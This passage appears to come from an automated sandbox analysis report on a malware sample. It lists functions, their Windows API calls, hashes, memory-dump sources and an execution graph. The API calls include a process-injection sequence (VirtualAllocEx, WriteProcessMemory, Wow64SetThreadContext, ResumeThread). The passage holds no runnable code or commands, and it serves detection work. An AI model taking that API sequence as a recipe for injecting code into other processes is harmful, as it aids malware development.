                                                        • Instruction Fuzzy Hash: 21213771D003098FDB14DFA9C885BEEBBF1FB48310F10842AE959A7650C7799941CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 067468B0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06746940
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297925881.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6740000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 04ace6cb279e5dfafdad4dc56eef0c3ab87938adbda65710094ffbf0b1176be7
                                                        • Instruction ID: 266a3d3d5b2cd08beda8c92c725eb40db68679c730244af018c2825e0186c017
                                                        • Opcode Fuzzy Hash: 04ace6cb279e5dfafdad4dc56eef0c3ab87938adbda65710094ffbf0b1176be7
                                                        • Instruction Fuzzy Hash: 12212676D003099FDB14DFAAC884BEEBBF5FF48310F10842AE959A7240C7799940CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 067462D8 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0674635E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297925881.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6740000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: c9faf2d871a23c492393b81acaa57b0856d93e8bea907449e5b8087845282e99
                                                        • Instruction ID: 1ecbfbf83e4f70d5f854729df508ffdff6468ab4d90b1496ec51740efb77f5ba
                                                        • Opcode Fuzzy Hash: c9faf2d871a23c492393b81acaa57b0856d93e8bea907449e5b8087845282e99
                                                        • Instruction Fuzzy Hash: 522145B1D003088FDB20DFAAC484BEEBBF4FB48324F14842AD519A7241CB789945CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04A600A2 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04A6012F
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297161494.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_4a60000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: cb60994687dcc03715a19dce0a94157c0bbc822af90aa0404aa5a8ee5108ae25
                                                        • Instruction ID: 9e27d9d2ef9bd157d38a37f9ca040353b27d78714c01db494b458e60c883b860
                                                        • Opcode Fuzzy Hash: cb60994687dcc03715a19dce0a94157c0bbc822af90aa0404aa5a8ee5108ae25
                                                        • Instruction Fuzzy Hash: 972103B5D012489FDB20CFAAD884AEEBFF4FB48310F14801AE959A3350C378A945CF64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 067462E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0674635E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297925881.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6740000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 5e5aed79a62a873a443e874a3256f35992735195dd0db943723dd0c930688671
                                                        • Instruction ID: 19a48c49c4a8f5fe6c3e768e8c3af925c818b9d2dbcd8ffe07e3bbe38b2ca317
                                                        • Opcode Fuzzy Hash: 5e5aed79a62a873a443e874a3256f35992735195dd0db943723dd0c930688671
                                                        • Instruction Fuzzy Hash: C32134B1D003088FDB24DFAAC485BAEBBF4EB48314F14842AD459A7640CB78A945CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 067469A0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06746A20
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297925881.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6740000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: c8e739df667ec62de44bf5f172a89132ecad62b71110275ff0de19a9151c2402
                                                        • Instruction ID: 516d07ca8bde37da7fda18caee859739ab673430cb94387aeffeca9e4762a322
                                                        • Opcode Fuzzy Hash: c8e739df667ec62de44bf5f172a89132ecad62b71110275ff0de19a9151c2402
                                                        • Instruction Fuzzy Hash: D52136B1D003199FDB20DFAAC884BEEBBF5FF48310F10842AE519A7240C7389900CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04A600A8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04A6012F
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297161494.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_4a60000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 8b8f663bfbd9b5de9ca3f90bde83095344f121e4ddd7047c6915844c84d2fa7d
                                                        • Instruction ID: 47eb658252a78896221322dfedc528e636e1a8972dd605f0638a750be49a7639
                                                        • Opcode Fuzzy Hash: 8b8f663bfbd9b5de9ca3f90bde83095344f121e4ddd7047c6915844c84d2fa7d
                                                        • Instruction Fuzzy Hash: 7421E2B5D012089FDB10CFAAD884ADEFBF8FB48310F14801AE919A3350D378A941CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 067467E8 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0674685E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297925881.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6740000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 7475a15f497677aa336eb0b7daf3b4a96aceb0b6503d84007d5e0a94cb9ff94f
                                                        • Instruction ID: 6288b8df468d853c28c848663872402b0695b7ed7af5b803bfb6ef926ffc1266
                                                        • Opcode Fuzzy Hash: 7475a15f497677aa336eb0b7daf3b4a96aceb0b6503d84007d5e0a94cb9ff94f
                                                        • Instruction Fuzzy Hash: 5F115976C003088FDF24DFAAD844BEEBBF5EB48314F10842AE529A7650C7799941CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0084CAD0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0084DA19,00000800,00000000,00000000), ref: 0084DC2A
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1290266906.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_840000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 3848acce3a88402532c073a71803d9951633aea2f477117df621c7072700d043
                                                        • Instruction ID: 3e589d82d9492d20a1b5595d8a1fe1c33e1d7128db3e7e5125707773c02d5024
                                                        • Opcode Fuzzy Hash: 3848acce3a88402532c073a71803d9951633aea2f477117df621c7072700d043
                                                        • Instruction Fuzzy Hash: E211F4B6D003088FDB20CF9AD484A9EFBF4FB88314F10842AD515A7200C375A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 067467F0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0674685E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297925881.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6740000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 34dd07631b38c32e5d55f9dcabeca7c9bad7c819ad0d8e90b67d4f77d9433afb
                                                        • Instruction ID: 2bcb77bc817c1286fba8d6e048cd87358ea24a0e42c7fe2da8e4344452c323be
                                                        • Opcode Fuzzy Hash: 34dd07631b38c32e5d55f9dcabeca7c9bad7c819ad0d8e90b67d4f77d9433afb
                                                        • Instruction Fuzzy Hash: 61112676C003489FDB24DFAAC844BDFBBF5EB48314F14841AE515A7650C7759540CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0674622B Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297925881.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6740000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: c7d38943bc4d35769e96555d6771116fb0313b9049ad0dcb9ef6031aef84dc75
                                                        • Instruction ID: d82bc1e8a8ce843efc6fb0f389e3b717026b08c89ae7033576b9f38009a79fd0
                                                        • Opcode Fuzzy Hash: c7d38943bc4d35769e96555d6771116fb0313b9049ad0dcb9ef6031aef84dc75
                                                        • Instruction Fuzzy Hash: B11146B1D003488FDB24DFAAC844B9EFBF4AF88224F14842AD519A7640CB79A505CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06749C18 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06749C7D
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297925881.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6740000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: edda0e04a6d9f4dbafd9b6415cbf96cf34a6ffadee8a84fcbe27249e2c3c3d19
                                                        • Instruction ID: 6a5b880030cce8c4c9c672b08e44aea077d937d2193529a73310186fd064a5ec
                                                        • Opcode Fuzzy Hash: edda0e04a6d9f4dbafd9b6415cbf96cf34a6ffadee8a84fcbe27249e2c3c3d19
                                                        • Instruction Fuzzy Hash: 2C1125B58003098FCB20DF99D888BEEFBF4EB48310F10841AD559A7610C375A941CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06746230 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297925881.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6740000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 87166a2119d82233f55dced3e12da27fc88650309898ab82779d33b6d878b75c
                                                        • Instruction ID: ab4cd4cae32217a62f378939000d8e0d212cdba63fc32161cf3f957e50e4c392
                                                        • Opcode Fuzzy Hash: 87166a2119d82233f55dced3e12da27fc88650309898ab82779d33b6d878b75c
                                                        • Instruction Fuzzy Hash: 671158B1D003488FDB24DFAAC44479EFBF4AB88324F10841AD419A7640CB79A500CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0084D938 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0084D99E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1290266906.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_840000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 4d9ddac322906202c2560bc858e28ad3efe032c7e6037c6aa639e426a88cf2b8
                                                        • Instruction ID: 2eb3a58e647bb10404910f62a21f594f2f766e6e2760286eff407bd8019574f4
                                                        • Opcode Fuzzy Hash: 4d9ddac322906202c2560bc858e28ad3efe032c7e6037c6aa639e426a88cf2b8
                                                        • Instruction Fuzzy Hash: A311DFB6D007498FDB20CF9AD444ADEFBF4FB88314F10842AD969A7610C379A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06749590 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06749C7D
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297925881.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6740000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 1cc960b95dc0c008510fc7235c102112043c736b4d780ea45ea572b911a849f5
                                                        • Instruction ID: c39f8366d077c166533f57ea0d89e1634fba18049fa632afec89236fae947bd6
                                                        • Opcode Fuzzy Hash: 1cc960b95dc0c008510fc7235c102112043c736b4d780ea45ea572b911a849f5
                                                        • Instruction Fuzzy Hash: 9511F2B58003499FDB20DF9AD988BDFFBF8EB48310F10845AE959A7610C375A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 007AD4C4 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1289019854.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ad000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7dd0c3d6aed1ccdf877c05c8787d6d61fb6f14e88c3c953baafe82d38b469f98
                                                        • Instruction ID: f128924a301a4faa0231ba28ac9330873196151cdf234bedefd597ac77affe71
                                                        • Opcode Fuzzy Hash: 7dd0c3d6aed1ccdf877c05c8787d6d61fb6f14e88c3c953baafe82d38b469f98
                                                        • Instruction Fuzzy Hash: EB212871904240DFDB25DF10D9C0B26BFA5FBC9318F24C669E8060B656C33ADC66DBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 007BD01C Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1289462454.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7bd000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c52b0fcc73d83f9e2896c64843594143ec84769ce5460522b345d881df91bb17
                                                        • Instruction ID: f23c1420d6069f5671a4e1c419c4f6ec0679f4028012fc985eeee0e890e22e44
                                                        • Opcode Fuzzy Hash: c52b0fcc73d83f9e2896c64843594143ec84769ce5460522b345d881df91bb17
                                                        • Instruction Fuzzy Hash: F221F275604304EFDB24EF24D9C4B56BBA5FB88314F24C56DE80A4B296D33ADC47CA62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 007AD4BF Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1289019854.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ad000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                        • Instruction ID: 2c3e3510497d56a536b3fcd36db0cd0114f65556e3e413bd2a65b9d56610e07a
                                                        • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                        • Instruction Fuzzy Hash: 0E11D676904240CFCB15CF10D5C4B16BF71FB94314F24C6A9D8450B656C33AD966CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 007BD017 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1289462454.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7bd000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                        • Instruction ID: 9e89a6f4bc6dfbcca4ddd60349554e5001c091e1b0b6d889e1bd4d0fea3ab47c
                                                        • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                        • Instruction Fuzzy Hash: C511DD75504280CFCB21DF10D5C4B55FFA2FB88314F28C6AAD8094B656C33BD80ACBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:11.4%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:173
                                                        Total number of Limit Nodes:19
                                                        execution_graph 33911 1010848 33912 101084e 33911->33912 33913 101091b 33912->33913 33916 1011380 33912->33916 33924 101148b 33912->33924 33917 10112c4 33916->33917 33919 101138b 33916->33919 33917->33912 33918 1011480 33918->33912 33919->33918 33922 101148b 5 API calls 33919->33922 33931 1017ea8 33919->33931 33937 671a653 33919->33937 33941 671a660 33919->33941 33922->33919 33925 1011396 33924->33925 33926 1011480 33925->33926 33927 101148b 5 API calls 33925->33927 33928 1017ea8 3 API calls 33925->33928 33929 671a660 2 API calls 33925->33929 33930 671a653 2 API calls 33925->33930 33926->33912 33927->33925 33928->33925 33929->33925 33930->33925 33932 1017eb2 33931->33932 33933 1017ecc 33932->33933 33945 6718d43 33932->33945 33951 6718d50 33932->33951 33957 6718f90 33932->33957 33933->33919 33938 671a672 33937->33938 33940 671a6e9 33938->33940 34011 671a294 33938->34011 33940->33919 33942 671a672 33941->33942 33943 671a294 2 API calls 33942->33943 33944 671a6e9 33942->33944 33943->33944 33944->33919 33946 6718d4c 33945->33946 33947 6718f7a 33946->33947 33948 6718fa0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 33946->33948 33949 6718f90 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 33946->33949 33950 67191f3 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 33946->33950 33947->33933 33948->33946 33949->33946 33950->33946 33952 6718d65 33951->33952 33953 6718f7a 33952->33953 33954 6718fa0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 33952->33954 33955 6718f90 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 33952->33955 33956 67191f3 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 33952->33956 33953->33933 33954->33952 33955->33952 33956->33952 33958 6718f98 33957->33958 33963 6718f9a 33957->33963 33958->33963 33965 6718d65 33958->33965 33959 671910b 33962 6719115 33959->33962 33982 67191f3 33959->33982 33960 6718f7a 33960->33933 33961 6719145 33961->33933 33962->33933 33963->33959 33963->33961 33964 6718fe3 33963->33964 33973 6719b28 33964->33973 33977 6719b18 33964->33977 33965->33960 33967 6718fa0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 33965->33967 33968 6718f90 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 33965->33968 33970 67191f3 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 33965->33970 33966 6719089 33966->33933 33967->33965 33968->33965 33970->33965 33993 6719b60 33973->33993 34000 6719b50 33973->34000 33974 6719b36 33974->33966 33978 6719b1c 33977->33978 33979 6719b36 33978->33979 33980 6719b60 2 API calls 33978->33980 33981 6719b50 2 API calls 33978->33981 33979->33966 33980->33979 33981->33979 33986 67191ff 33982->33986 33987 6718fc1 33982->33987 33983 6719145 33983->33962 33984 671910b 33985 6719115 33984->33985 33992 67191f3 3 API calls 33984->33992 33985->33962 33986->33962 33987->33983 33987->33984 33988 6718fe3 33987->33988 33990 6719b28 3 API calls 33988->33990 33991 6719b18 3 API calls 33988->33991 33989 6719089 33989->33962 33990->33989 33991->33989 33992->33985 33994 6719b95 33993->33994 33995 6719b6d 33993->33995 34007 6718d1c 33994->34007 33995->33974 33998 6719c7d GlobalMemoryStatusEx 33999 6719cae 33998->33999 33999->33974 34001 6719b54 34000->34001 34002 6719b6d 34001->34002 34003 6718d1c GlobalMemoryStatusEx 34001->34003 34002->33974 34004 6719bb2 34003->34004 34004->34002 34005 6719c7d GlobalMemoryStatusEx 34004->34005 34006 6719cae 34005->34006 34006->33974 34008 6719c38 GlobalMemoryStatusEx 34007->34008 34010 6719bb2 34008->34010 34010->33995 34010->33998 34012 671a29f 34011->34012 34016 671b820 34012->34016 34028 671b80b 34012->34028 34013 671a8c2 34013->33940 34017 671b84b 34016->34017 34040 671b240 34017->34040 34020 671b8ce 34023 671b8fa 34020->34023 34053 671b250 34020->34053 34024 671b240 GetModuleHandleW 34024->34020 34029 671b84b 34028->34029 34030 671b240 GetModuleHandleW 34029->34030 34031 671b8b2 34030->34031 34037 671b240 GetModuleHandleW 34031->34037 34038 671bcf0 GetModuleHandleW 34031->34038 34039 671bda0 GetModuleHandleW 34031->34039 34032 671b8ce 34033 671b250 GetModuleHandleW 34032->34033 34035 671b8fa 34032->34035 34034 671b93e 34033->34034 34034->34035 34036 671d2ef CreateWindowExW 34034->34036 34036->34035 34037->34032 34038->34032 34039->34032 34041 671b24b 34040->34041 34042 671b8b2 34041->34042 34062 671bf6f 34041->34062 34042->34024 34044 671bcf0 34042->34044 34049 671bda0 34042->34049 34045 671bd0b 34044->34045 34046 671bd0f 34044->34046 34045->34020 34047 671be4e 34046->34047 34048 671bf6f GetModuleHandleW 34046->34048 34048->34047 34050 671bdcd 34049->34050 34051 671be4e 34050->34051 34052 671bf6f GetModuleHandleW 34050->34052 34052->34051 34054 671c250 GetModuleHandleW 34053->34054 34056 671b93e 34054->34056 34056->34023 34057 671d2ef 34056->34057 34058 671d2bb 34057->34058 34058->34057 34059 671d3bb CreateWindowExW 34058->34059 34060 671d2dd 34058->34060 34061 671d41c 34059->34061 34060->34023 34063 671bf7a 34062->34063 34064 671b250 GetModuleHandleW 34063->34064 34065 671c09a 34064->34065 34066 671b250 GetModuleHandleW 34065->34066 34069 671c114 34065->34069 34067 671c0e8 34066->34067 34068 671b250 GetModuleHandleW 34067->34068 34067->34069 34068->34069 34069->34042 34070 671c24b 34071 671c292 34070->34071 34072 671c298 GetModuleHandleW 34070->34072 34071->34072 34073 671c2c5 34072->34073 34074 6c69db8 34076 6c69de4 34074->34076 34075 6c69eee 34076->34075 34077 6718f90 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 34076->34077 34078 6718d50 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 34076->34078 34079 6718d43 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 34076->34079 34077->34076 34078->34076 34079->34076 34080 fbd044 34081 fbd05c 34080->34081 34082 fbd0b6 34081->34082 34087 671d4b0 34081->34087 34093 671b36f 34081->34093 34097 671b374 34081->34097 34101 671d4a3 34081->34101 34088 671d4d6 34087->34088 34089 671b374 GetModuleHandleW 34088->34089 34090 671d4e2 34089->34090 34107 671b384 34090->34107 34094 671d5e0 34093->34094 34113 671b3ac 34094->34113 34096 671d5e7 34096->34082 34098 671b37f 34097->34098 34099 671b3ac GetModuleHandleW 34098->34099 34100 671d5e7 34099->34100 34100->34082 34102 671d4d6 34101->34102 34103 671b374 GetModuleHandleW 34102->34103 34104 671d4e2 34103->34104 34105 671b384 GetModuleHandleW 34104->34105 34106 671d4f7 34105->34106 34106->34082 34108 671b38f 34107->34108 34108->34107 34109 671b240 GetModuleHandleW 34108->34109 34110 671d649 34109->34110 34111 671b250 GetModuleHandleW 34110->34111 34112 671d6b7 34110->34112 34111->34112 34114 671b3b7 34113->34114 34115 671b240 GetModuleHandleW 34114->34115 34116 671d649 34115->34116 34117 671b250 GetModuleHandleW 34116->34117 34118 671d6b7 34116->34118 34117->34118

                                                        Executed Functions

                                                        Function 0101A2E8 Relevance: 3.1, Instructions: 3073COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 86ec6ca8d5e84a2d5bc1122f8b7aa9194abed7d4757e3aae7aa8c7aa55b0faf7
                                                        • Instruction ID: c67fad7e89487efc4fe1da6112e2a187f43b85957c7ac733bb3469fdad92beb8
                                                        • Opcode Fuzzy Hash: 86ec6ca8d5e84a2d5bc1122f8b7aa9194abed7d4757e3aae7aa8c7aa55b0faf7
                                                        • Instruction Fuzzy Hash: CA630931D10B198EDB51EB68C884AA9F7B1FF99300F15C6DAE45877125EB70AAC4CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0101A2E3 Relevance: 2.5, Instructions: 2501COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a340b119b68ab029680f2955f7e86432e5af0ceec9715a16cc1de1a4569c6023
                                                        • Instruction ID: 4e220d57ba628c0682e3f60a7858a0b6ce955035337e819c43b24de149abb73b
                                                        • Opcode Fuzzy Hash: a340b119b68ab029680f2955f7e86432e5af0ceec9715a16cc1de1a4569c6023
                                                        • Instruction Fuzzy Hash: B153E631D10B1A8ADB51EB68C884A99F7B1FF99300F15D7DAE45877121EB70AAC4CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 010141C8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V/k
